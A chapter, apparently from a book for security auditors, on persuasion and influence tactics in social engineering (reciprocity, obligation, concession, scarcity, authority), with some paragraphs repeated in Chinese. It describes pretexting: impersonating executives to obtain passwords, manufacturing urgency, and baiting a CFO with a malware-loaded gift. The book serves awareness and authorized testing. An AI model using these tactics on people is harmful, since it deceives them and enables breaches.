Influence and the art of persuasion are the process of getting someone else to want to do, react, think, or believe in the way you want them to.

If you need to, reread the preceding sentence. It is probably one of the most powerful sentences in this whole book. It means that using the principles discussed herein, you will be able to move someone to think, act, and maybe even believe the way you want him to because he wants to. Social engineers use the art of persuasion every day and, unfortunately, malicious scammers and social engineers use it, too.

Some people have devoted their life to researching, studying, and perfecting the art of influence. Those such as Dr. Ellen Langer, Robert Cialdini, and Kevin Hogan have contributed a very large repository of knowledge in this field. Mix this knowledge with the research and teachings of NLP (neurolinguistic programming) masters such as Bandler, Grinder, and more recently Jamie Smart, and what you have is a recipe to become a true artist.

True influence is elegant and smooth and most of the time undetectable to those being influenced. When you learn the methods you will start to notice them in commercials, on billboards, and when used by salespeople. You will start to get irritated at the shoddy attempts of marketing people and if you are like me, you will begin to rant and rave at terrible commercials and billboards while driving (which does not make my wife very happy).

Before getting into how social engineers use influence and persuasion, the chapter begins with a short tour of some of the key elements of persuasion and influence that I have compiled and used. This chapter will discuss things like reciprocation, manipulation, and the power of setting goals, just to name a few of these key elements.

Influence and persuasion can be broken down into five important aspects, as discussed in the following sections.

 

The Five Fundamentals of Influence and Persuasion

The five fundamentals of persuasion are crucial in obtaining any type of successful influence upon a target:

 
 
     
  • Setting clear goals
  • Building rapport
  • Being observant of your surroundings
  • Being flexible
  • Getting in touch with yourself
 

The whole goal of social engineering is to influence the target to take an action that may or may not be in their best interest. Yet they will not only take the action, but want to take the action, and maybe even thank you for it at the end. This type of influence is powerful and can make a social engineer who possesses these skills legendary.

World-renowned NLP trainer Jamie Smart once said, “The map is not the territory.” I love that quote because it blends perfectly with these five fundamentals. None of them is the whole sum on its own, but individually they are like points on a map that show you the whole territory of what you want to accomplish. The following section delves deep into the first fundamental: why setting clear goals is very important.

 

Have a Clear Goal in Mind

Not only should you have a clear goal in mind, you should even go so far as to write it down. Ask yourself, “What do I want out of this engagement or interaction?”

As I discussed in Chapter 5, especially in relation to NLP, a human’s internal systems are affected by his thoughts and goals. If you focus on something, you may be more likely to become it or get it. This doesn’t mean that if you focus on the thought of getting one million dollars, you will get it. In fact, it is unlikely. However, if you had a goal of making one million dollars and focused on the steps needed to make that money, your goals, education, and actions would increase the likelihood of your achieving that goal. The same is true with persuasion. What is your goal? Is it to change someone’s beliefs? To get him to take an action? Suppose a dear friend is doing something terribly unhealthy and you want to try to persuade her to stop. What is the goal? Maybe the end goal is to persuade her to stop, but maybe little goals exist along the way. Outlining all of these goals can make the path to influencing that person clearer.

After setting the goal, you must ask yourself, “How will I know when I have gotten it?” I once listened to a training program offered by Jamie Smart, one of the world leaders on NLP, and he asked each person in the classroom these two questions:

 
 
     
  • What do you want?
  • How will you know when you have it?
 

At this point, I paused the CD after the first question and answered out loud what I wanted from this course. Then I pressed Play again, and when he asked that second question, “How will you know you have gotten it?” I paused the CD again and was lost. It was clear to me that I didn’t have a roadmap. I knew what I wanted out of that course, but I didn’t know how to gauge when I had gotten it.

Knowing what you want out of your engagements is an important aspect of influence and persuasion tactics. When you approach a target knowing what your goals are and what the indicators are that you are getting what you want, then you can clearly identify the path you need to take. Clearly defined goals can make or break the success of the influence tactics used by a social engineer, as well as make the next step much easier to master.

 

Rapport, Rapport, Rapport

Chapter 5 has a whole section on rapport building. Read it, study it, and perfect your rapport-building skills.

Developing rapport means that you get the attention of the person you are targeting and his unconscious mind, and you build trust within that unconscious portion. Mastering the skill of building rapport can change the way you deal with people, and when it comes to social engineering, it can change your whole methodology.

To build rapport, start where the person you want to influence is mentally—try to understand their frame of mind. Are they suspicious? Are they upset, sad, or worried? Whatever emotional state you perceive them to be in, start from there. Do not focus on your goals as much as on understanding the person. This is a very vital point. It means a social engineer must understand his target well enough to picture where the target is mentally. What are the target’s thoughts and state of mind?

For example, imagine you want to influence your dear friend to want to quit smoking or doing drugs or something else. Notice you don’t want to convince her to quit, but convince her to want to quit. Your goal cannot be about you, right? It must focus on the target. You can’t start your conversation with what her addiction is doing to you and how much you hate the smell, and so on. The argument has to be what is in it for her. You cannot start the conversation with a verbal attack about what the person has done to you with their habit; you need to understand where that person’s frame of mind is, accept it, and come into alignment with it.

Social engineering is much the same: you can’t start where you are mentally. This is going to be a struggle for many people. Do you know why she smokes? Do you understand the psychological, physical, or mental reasons why? Until you can really get into her shoes, you cannot build a strong rapport and your efforts at influence will fail.

In addition, you cannot always base the idea of building rapport on logic. I once was in the hospital with a dear friend who was dying from throat cancer. He had smoked for more than 40 years, and one day he found out he had cancer. It spread fast, bringing him to the hospital to live out his last days. His children would come to visit and every now and then they would leave the room. I thought they were overcome with emotion. One time after they excused themselves I went out to comfort them, and they were outside the hospital smoking! I was dumbfounded. I don’t smoke and have no desire to, and although I can understand how strong an addiction can be, I couldn’t understand how, after seeing the pain their father was in, they could raise a cigarette to their lips.

Logic would not win in this case. Telling my friend’s children why smoking is bad and how it will kill them would do no good—this information was useless because it was combative and only made me feel good in saying it, but did not align with their present frame of mind. Until you understand the person you cannot successfully build a good enough rapport to influence him or her.

 

Getting someone to want to do something is a blend of emotion and logic, as well as understanding and humility in many cases. Once I walked into an office I was going to do some work for, and I had heard a funny comment outside, so when I walked into the main lobby I was chuckling. The woman behind the desk must have just done something embarrassing, because when she saw me she immediately got angry and yelled at me, “It’s not very funny and you are a jerk.”

Now I didn’t know this woman, and to tell you the truth I had a goal in mind that this interaction was not going to help. In addition, I felt insulted that she assumed I was laughing at her, and wanted to lash back at her. But instead, I saw she was upset. I got close to the counter so as not to embarrass her any more, I looked her in the eye, and with sincerity said, “I am so sorry if you thought I was laughing at you. I was in the parking lot and some of your workmates were telling a story about a party over the weekend and I thought it was very funny.”

She looked at me and I could tell she was now even more embarrassed, so to save face for her, I loudly said, “Ma’am, I am sorry for laughing and embarrassing you.” This allowed her to save face in front of those around us. She understood that I “took one for the team” and she responded with extreme kindness. A minute later she apologized, and it worked to my benefit: I was given all the data I asked for, data I normally would have had to work very hard to get.

A teacher I once had used to tell me to “kill them with kindness.” That is a pretty powerful statement. Being kind to people is a quick way to build rapport and to establish yourself in the five fundamentals of persuasion and influence.

One method to influence people using kindness and rapport is to ask questions and give choices that lead them to the path you want. For example, I was once influenced to take a job I really didn’t want as part of a team effort. The team leader was very charismatic and friendly and had the “charm factor” that allowed him to speak to anyone. He approached me and said, “Chris, I wanted to talk to you separately from the team. I need a right hand for a small project. But the person needs to be a go-getter, self-motivated. I think this is you, but I don’t want to assume; what do you think?”

I was excited and flattered by the compliments and the potential to be “important,” so I responded, “I am a very self-motivated person. Whatever you need, tell me.”

The team leader continued, “Well, I am a big believer in leading by example. And I think you have that leadership quality. The problem is, some on the team do not, and they need a strong person to show them how it is done.”

Before the end of the conversation, what he wanted appeared as if it was my idea, which made it impossible to back out of. Powerful indeed, and it all started with the power of persuasion.

 

Be in Tune with Yourself and Your Surroundings

Being aware of yourself and your surroundings, or sensory acuity, is the ability to notice the signs in the person you are targeting, and in yourself, that tell you whether or not you are moving in the right direction.

Many of the principles discussed in the previous chapter apply to persuasion. Reading body language and facial signs can tell you much about your influence on the person.

To really master the dual art of influence and persuasion, you have to become a master watcher and master listener. Chris Westbury, a cognitive neuropsychologist at the University of Alberta, Canada, estimates that human brains process information at 20 million billion calculations per second. Those calculations are represented by facial expressions, microexpressions, gestures, posture, voice tones, eye blinks, breathing rate, speech patterns, nonverbal utterances, and many more types of distinguishing patterns. Mastering influence means being aware of those subtle things in yourself and others.

I found that being observant became easier for me after receiving some training from Dr. Ekman in microexpressions. I found afterward that I became much more aware not only of what was going on with those around me, but also of myself. When I felt a certain expression on my face, I was able to analyze it and see how it might be portrayed to others. This recognition of myself and my surroundings was one of the most enlightening experiences of my life.

NLP experts promote minimizing your internal dialog when trying to influence others. If you approach the target thinking about the next stage of the attack, the end goal, or comebacks for potential conversation stoppers, that internal dialog can cause you to miss a lot of what is going on around you. Being observant takes a lot of work, but the payoff is well worth it.

 

Don’t Act Insane—Be Flexible

What do I mean by not acting insane and being flexible? One definition of insanity that’s been floating around for years is “doing the same thing over and over and expecting different results.” Being willing and able to flex is one of the keys to persuasion.

You can think of this flexibility in terms of physical things. If you were tasked to persuade or bend something, would you rather it be a branch from a willow tree or a steel rod? Most people would say the willow branch because it is flexible, easier to bend, and makes the task accomplishable. Trying to persuade others while being unyielding and inflexible doesn’t work; persuasion requires that you be flexible, too.

Many times, an audit will not go as planned. A good social engineer will be able to roll with the punches and adjust their goals and methods as needed. This does not go against the idea of planning ahead; instead, it makes the point that you should not be so rigid that, when things do not go as planned, you cannot move and adapt so the goal is not lost.

The way a person would view an insane person is the way a target would view the inflexible social engineer. The social engineer would look unreasonable, and you would most likely never reach the endgame.

 

Get in Touch with Yourself

By getting in touch with yourself, I am not suggesting some Zen meditation avenue, just that you understand your emotions. Emotions control practically everything you do, as well as everything your target does. Knowing your emotions and being in touch with yourself can help you lay the groundwork for being an effective social engineer.

Going back to the earlier example of you and your smoking friend—if you have a deep-seated hatred for those who smoke, that hatred affects how you approach your friend. It can make you act, express, say, or do something that will close the door to persuasion. You may never compromise on certain things, and being aware of those things and your emotions about them can help you to develop a clear path toward influencing a target.

These five fundamentals are key to understanding influence and persuasion. Being able to create an environment where a target wants to do what you are requesting is the goal of persuasion, and these five fundamentals will help you create that environment. The next section examines how social engineers use these fundamentals.

 

Influence Tactics

As mentioned, social engineers must practice the skill of persuasion until it becomes part of their everyday habits. This doesn’t mean that they must influence everyone in everything they do, but being able to turn this skill on and off at will is a powerful trait of a good social engineer.

Influence and persuasion have many aspects you can use, and many that fit easily into an audit. Other aspects might not fit as easily, but hold a very powerful position in the world of influence. The following sections cover eight different techniques of influence that are used often by media, politicians, government, con men, scammers, and of course, social engineers.

Each section provides an analysis of the technique to see how it is used in other areas of influence besides social engineering, as well as a closer look at how it can apply to a social engineer.

Reciprocation

Reciprocity is the inherent expectation that when others treat you well, you respond in kind. A simple example is when you are walking into a building—if someone holds a door open for you, he expects you to say thank you and then make sure that the next door stays open for him as he comes in.

The rule of reciprocity is important because the returned favor is often done unconsciously. Knowing this means that you now have a step up on how you can use it as a social engineer. Before getting into that, though, here are a few examples where reciprocity is often used:

 
 
     
  • Pharmaceutical companies will spend $10,000–$15,000 per doctor (yes, per doctor) on “gifts” that might include dinners, books, computers, hats, clothing, or other items that have the drug company’s logo on them. When the time comes to choose a drug to support and buy, to whom do you think the doctors are more likely to go?
  • Politicians are influenced in much the same way. It is no secret that politicians or lobbyists are often more favorable to people who helped their political campaign than to those who did not.
  • Reciprocity is often used in business, especially when it comes to matters of contracts. Maybe the sales guy will pay for a meal, then later on ask for a concession in the contract. The client feels compelled to give this concession.
  • A fellow employee filled in for you one week when you needed a day off. Now she asks you to return the favor, but you have plans. In this situation, people will reschedule and honor the request.
 

All of these are examples of reciprocity. Sociologist Alvin Gouldner wrote a paper called “The Norm of Reciprocity” (http://media.pfeiffer.edu/lridener/courses/normrecp.html) in which he states:

Specifically, I suggest that a norm of reciprocity, in its universal form, makes two interrelated, minimal demands: (1) people should help those who have helped them, and (2) people should not injure those who have helped them. Generically, the norm of reciprocity may be conceived of as a dimension to be found in all value systems and, in particular as one among a number of “Principal Components” universally present in moral codes.

Basically, his research led him to see that reciprocity works regardless of cultural background. Reciprocity, used under the right circumstances, is all but impossible to resist.

Think of reciprocity as the process shown in Figure 6-1.

Figure 6-1: The cycle of reciprocity.

The following sections expand on some key points of the preceding idea.

 

Give Something Away

The thing you give away can’t be some simple piece of junk. The thing given must have value—to the recipient. Giving away a beautiful hardcover novel written in a language the recipient does not read or collect is useless.

The item can be a service, a physical item, some valuable information, assistance, or anything else that the receiver will deem of value (even something as simple as holding the door or picking up something dropped). Some sales organizations promote this method but then fall short by offering something that has no value. Imagine you are at a trade show and at each table is a giveaway. If you walk up to a table and notice a pile of cheap-looking pens, you might just walk by. The next table has an interesting puzzle-like game. You are intrigued, so you pick it up; after you spend a few minutes playing with it, a salesperson approaches and says, “You want a hint?” After showing you a small hint, he asks whether you have a minute so he can show you a service you might really love.

How can you say no? You got an intriguing game and a free hint, and now all he wants is a minute of your time? It’s a perfect setup.

 

Create Indebted Feelings

The more value the gift has to the recipient and the more unexpected it is, the greater the sense of indebtedness.

It is important not to let the gift become an obvious manipulation tactic. Don’t say or act like, “I gave you this great gift, now you owe me.” Even thinking it can take away any feelings of indebtedness. The “gift” should be totally free and of great value to the recipient.

The Humane Society of the United States, for instance, gives away personalized mailing labels as a free gift. No strings are attached, and many people use them for holiday cards or personal letters. They are attractive and of good quality. You sign up for them, and many months later you will get a call asking for a donation to support your local Humane Society. The recipient’s sense of obligation is usually too great not to contribute even a little.

By way of another example, Fortune Magazine offers college professors free issues of its magazine to try out in their classes, with no strings attached at all.

Many examples of reciprocity like these exist. On the flip side, many companies fail at reciprocity by thinking that things like the following are good gifts:

 
 
     
  • 外观精美、色彩丰富的企业宣传册
  • Sharp-looking and colorful corporate brochures
  •  
     
  • 无用且破烂的玩具
  • Useless and junky toys
  •  
     
  • 有关您的产品或公司的销售资料
  • Sales literature about your products or company
  •  
 

这些东西不会让人产生感激之情。接受者必须认为“礼物”很有价值。另一个可以让人产生真正感激之情的“礼物”来源是信息。对某些人来说,提供有价值、有益或有用的信息实际上比实物礼物更有趣。

These things do not build indebtedness. The recipient must deem the “gift” valuable. Another source of “gifts” that can build true indebtedness is information. Giving away a valuable, beneficial, or useful piece of information can literally be of more interest than a physical gift to some.

 

Ask for What You Want

On one occasion as I was entering a building, I saw a man who looked very much to be the “boss” get out of his car parked in the spot marked “For CFO Only,” and he was on his cell phone. He was not a happy guy, and I overheard him telling someone that he was upset because he had to go inside and let some people go. I assumed from his tone that he was on with his wife or girlfriend and he didn’t like the job he was about to do.

I walked past him and went to the front desk and as I walked up I saw that the girl behind the desk was playing Minesweeper. As I approached the counter she gave me the standard, “How can I help you?” She had a look on her face that said she was bored and not in the mood. I said, “Look, I am here for a meeting, but your boss is about to walk in and he is in a bad mood…” I then trailed off and just stood there with a folder in my hand. A few seconds later the boss stormed in the front door and I said loudly, “Thank you so much for your assistance.”

She looked over and said to me, “Excuse me, sir,” then said to her boss, “Good morning, Mr. Smith, I have your messages,” and then handed him a small pile of paper as he walked by.

When he disappeared to his office she thanked me profusely. I just saved her and she knew it. The information I gave her was invaluable, and my next words would be imperative: “I need your help. I wanted to see the HR manager just for a brief meeting. Can you get me into her office real quick?”

She walked me back to the manager’s office and introduced me as “her friend” who had stopped in. Within minutes my plan was launched, and all thanks to reciprocity.

As a social engineer, look for little opportunities to give out information that will make you valuable to the recipient and, more importantly, make the recipient indebted to you.

Be aware of your surroundings and what little things you can do to make your targets indebted to you. Remember it doesn’t have to be something amazing, just something that they value. A good point to keep in mind is to not “stalk” the target. Standing and staring at him or her waiting for an opportunity to do or say something can be off-putting. These principles should be natural.

Naturalness means you start practicing these principles in everyday life. Hold doors for people, be very polite, and look for opportunities to do good things for others. These actions will become second nature and you will have fewer struggles doing them in an audit.

Reciprocity is a powerful influence tactic, and the next two principles discussed are closely tied into it.

Obligation

Obligation has to do with actions one feels he needs to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. In the context of social engineering, obligation is closely related to reciprocation but is not limited to it. Obligation can be as simple as holding an outer door for someone, which will usually make him hold the inner door for you. It can be escalated to someone giving you private info because you create in them a sense of obligation to you. Obligation is a common attack vector used when targeting customer service people.

You can also use obligation in small doses by utilizing smart complimenting. For example, compliment the person, then follow it up with a request. This technique is very easy to do wrong if you are new or inexperienced and can come across so fake that it alerts the target’s inner sense and has the wrong effect. But if done properly, it can lead to obtaining even little pieces of valuable information.

An example of complimenting in the wrong way would be something like, “Wow, you have beautiful eyes, can I get into your server room?” Sounds stupid, huh? Be sure to say your method out loud to see how it sounds. If it sounds like a cheap pickup line then it has to go.

A small conversation like this, on the other hand, can be a proper way to compliment:

As you approach the receptionist’s desk you see some pictures of a couple of little children at Disney World and after you introduce yourself you say, “Are those your kids? They sure are cute.” Regardless of whether they are the receptionist’s kids or her nephews, she will most likely enjoy your compliment. Then you follow up with, “I have a couple of my own. They keep us young, huh?”

“Yes, my two kids. And I am not sure about young,” she chuckles, “but they do tire me out.”

“I haven’t taken mine to Disney yet,” I say. “Did you find they enjoyed it at that age?”

“Oh yeah, they loved every second of it,” says the receptionist. “As long as my daughter is with her Daddy, she is having fun.”

“Ah, yeah, I have my little princess too,” I reply. “Well, I could stand here and talk about my kids all day, but I am wondering if you can help me out. I called in and spoke to someone last week about a new HR software package and I said I would drop off this information packet, but I lost the paper I wrote her name on. I am terribly embarrassed.”

“Oh, that’s probably Mrs. Smith,” offers the receptionist. “She handles all of that.”

“You are a life saver. I owe you one. Thank you.”

These types of compliments go a long way to opening the target up to be more agreeable to influence.

The golden rule—treat others as you would wish to be treated—is a key principle in creating obligation. Treating people kindly and giving them something they may need, even if it is as small as a compliment, can create a sense of obligation to you.

Psychologist Steve Bressert makes this point in his article “Persuasion and How To Influence Others,” in which he states, “according to the American Disabled Veterans organization, mailing out a simple appeal for donations produces an 18% success rate. Enclosing a small gift, such as personalized address labels, nearly doubles the success rate to 35%. ‘Since you sent me some useful address labels, I’ll send you a small donation in return.’”

If you want to prove to yourself the power of this principle try this simple exercise. Even something as small as a question can create obligation. The next time someone asks you a question, say nothing. Just stay silent or ignore it and move on in the conversation. Notice how awkward that is; something as simple as a question creates a sense of obligation to answer. Simply asking the target a question can lead to amazing results.

If your first action creates a feeling that there is an expected follow-up, then fulfilling that expectation can lead to strong feelings of obligation. When the person with whom you are interacting expects a result, fulfilling it can create a strong sense of commitment in him or her to do the same for you.

This method can be used, for example, by sending the CFO of a company a piece of technology, maybe an iPod loaded with malicious software. When he gets the gift he is obligated to plug it in. One successful attack vector I saw in play was where the social engineer sent a small relevant gift to the CFO or CEO with a card that said, “Please accept a small gift from our company. All we ask is that you browse our products at www.products.com and download our PDF catalog here at www.products.com/catalog.pdf. I will call you next week.”

This method was successful every time.

Concession

A concession, or the act of conceding, is defined as “an acknowledgment or admission,” or “the act of yielding.” Concessions are used often within the social engineering context as a play on the reciprocation instinct of humans. Humans seem to have a built-in function that makes them want to “do unto others as they do unto” you. A social engineer can use the “something for something” idea or the “I’ll scratch your back if you scratch mine” principle.

There are basic principles to concessions and how to use them properly:

  • Label your concessions: Make it known when and what you are conceding, which makes it difficult for your mark to ignore the urge to reciprocate. This will take balance because you don’t want to blow a trumpet, so to speak, while you announce a concession, but a simple statement like, “OK, I’ll give you this one,” or “I will meet you halfway,” shows you are willing to concede.
  • Demand and define reciprocity: You can start by planting the seeds of reciprocation and this increases your chances of getting something in return. An easy way to start planting these seeds is through nonverbal communication showing that you are flexible, and also by being a good listener. These little things can make a big difference when building feelings of reciprocation in your target.
  • Make contingent concessions: You can use “risk-free” concessions when trust is low or when you need to signal that you are ready to make other concessions. What I mean by this is a concession that does not come with a “now you can do something for me” attitude. By giving in to something the target wants or needs with no counter demand, you can build a very strong bond with the target.
  • Make concessions in installments: The idea of reciprocity is deeply ingrained in our minds. Most people feel that if someone does them a favor then they are socially contracted to eventually return that favor. Similarly, if someone makes a concession, say in a negotiation or bargaining agreement, then one instinctively feels obligated to “budge” a little bit, too. Since this is a fact, you do not have to feel that all your concessions must be at one time. You can make “installments” with your concessions, where you give in a little here and a little there over time to keep your target reciprocating.

Concessions are used daily by salespeople, negotiators, and social engineers. A successful social engineer can use and abuse this instinctual tendency by not only resisting the manipulations being placed on them by others but also by trying to take over the situation completely. Concession and reciprocation skills play well with many of the other social engineering techniques discussed within the pages of this book.

An example of how many people fall for concessions can be illustrated with telemarketers who call for donations. They use a strategy for gaining concessions after someone is first given the opportunity to turn down a large request. The same requester counteroffers with a smaller request that you are more likely to accept than the large request.

Large request: “Can you donate $200 to our charity?”

Response: “No, I cannot.”

Smaller request: “Oh, I’m sorry sir, and I understand. Can you donate only $20?”

People who are not aware of this technique might feel like the burden is taken off of them and realize they can part with a mere $20 rather than the initial asking price of $200.

Another great example appeared in an article (http://ezinearticles.com/?How-to-Negotiate-the-Salary-Using-the-Power-of-the-Norm-of-Reciprocity&id=2449465) written by David Hill:

The power of this norm can be felt in most bargaining situations. Assume a buyer and a seller are haggling over the price of a car. The seller starts out with a bid at $24,000. The buyer finds this offer unacceptable and makes a counter bid at $15,000. Now, the seller lowers his bid to $20,000, i.e., he makes a concession. In this case, the buyer will most often feel inclined to increase his bid, maybe to $17,000. The reason why the buyer will feel this inclination is because of the presence of the norm of reciprocity. This norm now demands that the buyer responds to the seller’s concession with another concession.

As with most of the principles discussed so far, the concession must be valuable to the receiver. You can’t concede something that is valuable only to you or you lose the power you gain with a good concession.

As a social engineer, not giving a concession that will cause you to lose face, rapport, or your position is also imperative. A delicate balance must exist between the concession and your standing with the target, and finding it is half the work. Find it, though, and concessions can be a very serious tool in your hands.

Scarcity

People often find objects and opportunities more attractive if they are rare, scarce, or hard to obtain. This is why you will see newspapers and radio ads filled with “Last Day,” “Limited Time Only,” “Only 3-Day Sale,” and “Going Out of Business Forever” messages that entice people to come from all over to get a share of the soon-to-be-never-seen-again product.

The use of scarcity in the sales context is best known with the catch phrase “Act now! Supplies are limited!” Other techniques are the common “The first X callers get a free widget,” or having an intentional short supply of a popular product. In recent times, this practice was most popularly alleged with the Nintendo Wii. Jason Dobson, a writer for Gamasutra, said, “But I think [Nintendo] intentionally dried up supply because they made their numbers for the year. The new year starts April 1, and I think we’re going to see supply flowing” (www.gamasutra.com/php-bin/news_index.php?story=13297).

Where I live, a car dealership ran an ad on a Thursday stating it had to get rid of X number of cars due to new stock arriving. The prices were so low and some of the cars—wait for it—were no longer being produced, and that weekend was the last weekend ever that you could come in for a piece of auto-selling history.

The sales went through the roof that weekend, so the sale was over right? Nope, that ad ran every Thursday for more than three months. I often wondered how people just didn’t catch on to it, but the dealership sold a lot of cars using this method.

Social events can often appear to be more exclusive if scarcity is introduced. The perceived social benefit of attending these events often goes up in these circumstances. In advertising, this point is driven home with ads for music events that point out how the last concert was quickly sold out.

Many popular restaurants have been known to close off sections of the restaurant to appear busier than they really are. The perception that they are extremely popular can often trigger a heightened desire to eat at that establishment. To see an ad that actually mentions the use of scarcity in promoting an event, go to www.social-engineer.org/wiki/archives/Scarcity/Scarcity-Advertisment.html.

This ad played on four major components of scarcity:

  • The launch is limited access.
  • The application is not public and is limited.
  • Promoters are handpicked and limited.
  • The e-book is free to those lucky enough to be chosen to come.

All of these points use scarcity by making the would-be partygoers feel that getting into this event is so difficult that only the elite, the few, and the proud can even have a remote chance of stepping foot onto that hallowed ground.

The basics of economics are made up of the allocation of resources that have alternative uses. This allocation is driven by the scarcity of the objects that are being allocated. The rarer the resource, the higher the perceived value the object retains. This rarity is why gold is worth more than salt, which is worth more than clay.

Also, within daily interactions scarcity is often used. Scarcity can be introduced into social situations in an attempt to make something one has go up in value. For instance, one might act like he is very busy on a regular basis, and free time is hard to come by. This action may excuse him from not spending time with someone he may have an obligation to spend time with, and at the same time make time that is spent seem that much more valuable.

You can manipulate attention through the use of scarcity as well. Think of how many people complain about salesmen bothering them in a store when there is no scarcity of salespeople’s attention, yet they are just as upset when they are ignored by salespeople when their attention is scarce. On the whole, people are driven to desire that which is hard to obtain, because it is viewed as having more value. This holds true for attention as well.

Scarcity is often used in social engineering contexts to create a feeling of urgency in a decision-making context. This urgency can often lead to manipulation of the decision-making process, allowing the social engineer to control the information provided to the victim. This is done commonly by using a mixture of authority and scarcity principles. For example, saying something like, “The CFO, Mr. Smith, called me before he left for the long weekend and told me to come down and fix his email problem. He said he was sick and tired of the crashes and wanted it fixed before Monday.” This creates urgency alongside scarcity in that the CFO is not available to speak to and time is the scarce item.

Using scarcity mixed with other principles can also make the attack even deadlier. Either way, scarcity creates a desire and that desire can lead someone to making a decision he might regret later.

This was proven to me recently when a truck pulled into my driveway with a freezer in the back. This decently dressed young man approached my wife and explained that he is a meat salesman. He delivers meat to customers and was just about to head back to the office and saw her working in the yard. He began talking about meat prices and how expensive things are in the store. My wife is a very price-conscious shopper, so this built rapport. Plus he had a very pleasant southern accent and called her “ma’am” and was very respectful.

After a few minutes of talking, she blurts out the question that usually stops salesmen dead, “How much do you want?”

Without missing too much of a beat he says, “Listen, I have been selling these all day for $400 per box, but this is my last box. I would love to just go back to the office with an empty freezer and give you some high-quality meat in the meantime.”

Oh no, the last box! He told her before he only comes through once every two months. The desire has been raised, but my wife is no dummy. She knew she was being manipulated. She excused herself and came to get me.

He went through his spiel and laid on the scarcity thick. Of course, this type of an account can be a lesson on how to not fall for this tactic. The problem is that emotion gets involved. He sees that I have a grill outside that looks used, so he knows I love to cook outside and he plays on that. He then talks about the quality of meat and quickly makes comparisons to restaurant quality and what is in his boxes.

Many people could easily fall for the emotional aspect of his sales pitch. “What if it is his last one?” “He is right, this is much cheaper than eating out.” “He comes to me…I don’t even have to drive to the store.”

Instead, I whipped out a calculator and asked him for the amount for the two last boxes, divided by the weight and then asked my wife how much she normally pays per pound for a Delmonico or ribeye in the store. When her price came in lower by $3.00 per pound I simply just shut up. Now his emotions get involved. He scrambles to save face. He lowers his price by $150 off the bat. I again do the math and he is still $.50 more per pound.

He tries to talk about quality, convenience, and all those aspects that make it worth the $.50 more. I shift my posture and position to be away from him and to show disinterest. Without saying anything, he trails off at the end of a weak spiel and offers me another $50 off. I tell him, “Sorry, I just don’t think it’s worth it.”

He then does the classic mistake that shows how his claims of scarcity were false—he caves in more. “How much do you want to pay for these boxes?”

“I probably could do $100.”

“If you can give me $125 we can call it a deal.”

Now mind you a little bit ago he was at $400 per box and they were the last two in this area for two to three months. This should have been a bidding war for that value, but instead, I sent him packing with his two boxes of meat and no cash.

The lesson in this story for social engineers is that for scarcity to work it either has to be real, or you have to stick to your guns to give the appearance of reality.

People will perceive the value higher when something is really in need. A malicious example of this is how the petrol companies raised the prices of fuel after Hurricane Katrina. The claim was that fuel was in shortage due to the destruction, which caused terrible price increases. Of course, if this were true then the fuel would be worth a lot more than it is; instead it was an example of the claim of scarcity used to make money. Yet at the same time, when BP’s error caused millions of gallons of oil to be lost in the Gulf of Mexico, ruining the ecosystem, instead of fuel prices skyrocketing due to lack of supply, they dropped. How? Well I won’t get into that here, but it proves the point that for scarcity to work, it has to be believable, and this is where the oil companies fail and where social engineers can fail, too.

From a social engineer’s standpoint, the more limited or difficult it is to obtain an opportunity, the more value it will have to people. If information is deemed as private, restricted, and hard to come by, and you are willing to share it with someone, you have just gained a lot of value in their eyes.

A social engineer can leverage scarcity with information by using a statement like, “I am not supposed to be saying this but…” or “I am not sure if you heard this news, but I overheard…” Statements like these spoken in hushed tones imply that this information is scarce.

Authority

People are more willing to follow the directions or recommendations of someone they view as an authority. Finding a person who has enough assertiveness to question authority directly, especially when that authority holds direct power over him or is face-to-face with him is uncommon.

Children, for example, are taught to obey adults such as teachers, counselors, priests, and nannies because they have authority over them. Often, questioning authority is deemed as disrespectful and abject obedience is what is rewarded. These principles carry over into adult life because we are taught to respect authority figures and not question rules or orders given to us by those whom we deem authorities.

Unfortunately, it is this principle that leads many children into the hands of abusers and molesters. Not this principle alone, of course, but those who prey on children realize how children are taught about authority and often seek out those who appear to be more compliant. Similarly, malicious social engineers use this principle to manipulate their targets to take some action or inaction that can lead to a breach.

Understanding how authority is used from a social engineering aspect is important. German sociologist and political economist Max Weber divided authority into categories that I have adapted to fit more closely into the realm of social engineering.

Legal Authority

Legal authority is based upon government and law. This generally applies to law enforcement officers or others who enforce the laws of the land, area, or facility you are presently in.

As a social engineer, pretexts that involve law enforcement or other government officials are usually illegal. However, security guards, bank security, or other types of enforcement authority figures can be well represented and are often used by social engineers.

In one episode of the BBC television program The Real Hustle, Paul Wilson and his cohorts dressed up like the guards who collect the money. When someone shows up in the uniforms that look similar to the real ones and acts as a normal person in that authoritative position would act, targets have little reason to doubt the imposter is who he “says” he is. Acting as an authority figure is a major ploy used by social engineers to gain access to a company.

另一种有效的伎俩是假扮为寻求特定信息的律师。扮演一个普遍受大众恐惧或尊敬的角色是使用法律权威伎俩的一种方式。

Another ploy that can be effective is posing as a lawyer who is seeking certain information. Playing a role that is generally feared or respected by the masses can be one way a legal authority ploy is used.

 

Organizational Authority

Organizational authority is quite simply any authority defined by means of an organization. Typically, this refers to a supervisory hierarchy. Someone in a position of power in an organization has more power, and access to more information, than someone at the bottom of the hierarchy.

In a social engineering audit, a consultant may impersonate the CIO or someone else with clearly defined organizational authority. The consultant may then be able to obtain passwords or other information from the help desk or any other employee who perceives that the impersonated person has authority over him or her.

In a paper entitled "The 'Social Engineering' of Internet Fraud," Jonathan J. Rusch of the U.S. Department of Justice writes, "People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present" (www.isoc.org/inet99/proceedings/3g/3g_2.htm).

This ploy is used in other ways too: not by acting as if you are the CFO, but as someone sent or authorized by the CFO. The authority the name and title wield may be enough, in the eyes of the target, to grant that power to the attacker.

Rusch cites an experiment performed by Robert B. Cialdini and recorded in his book Influence (1993), which showed that 95 percent of nurses at 22 stations in three different hospitals were willing to administer a dangerous dose of medication to patients based on a phone call from a researcher purporting to be a physician the nurses had never met.

This experiment clearly shows that, based on orders and the perceived notion of authority, people may take certain actions despite their better judgment. This type of authority can be, and often is, used to exploit companies into giving away valuable data.

Social Authority

Social authority refers to the "natural-born leaders" of any social group. A social group could consist of co-workers, college friends, or any other gathering of people.

In Influence, Cialdini writes, "When reacting to authority in an automatic fashion there is a tendency to often do so in response to the mere symbols of authority rather than to its substance."

For social authority to arise, an extraordinary amount of time or structure may not be needed to define an authoritative figure. In any setting, a quick flash of social proof, where people are influenced by a group of people taking the same action, may help give a person social authority.

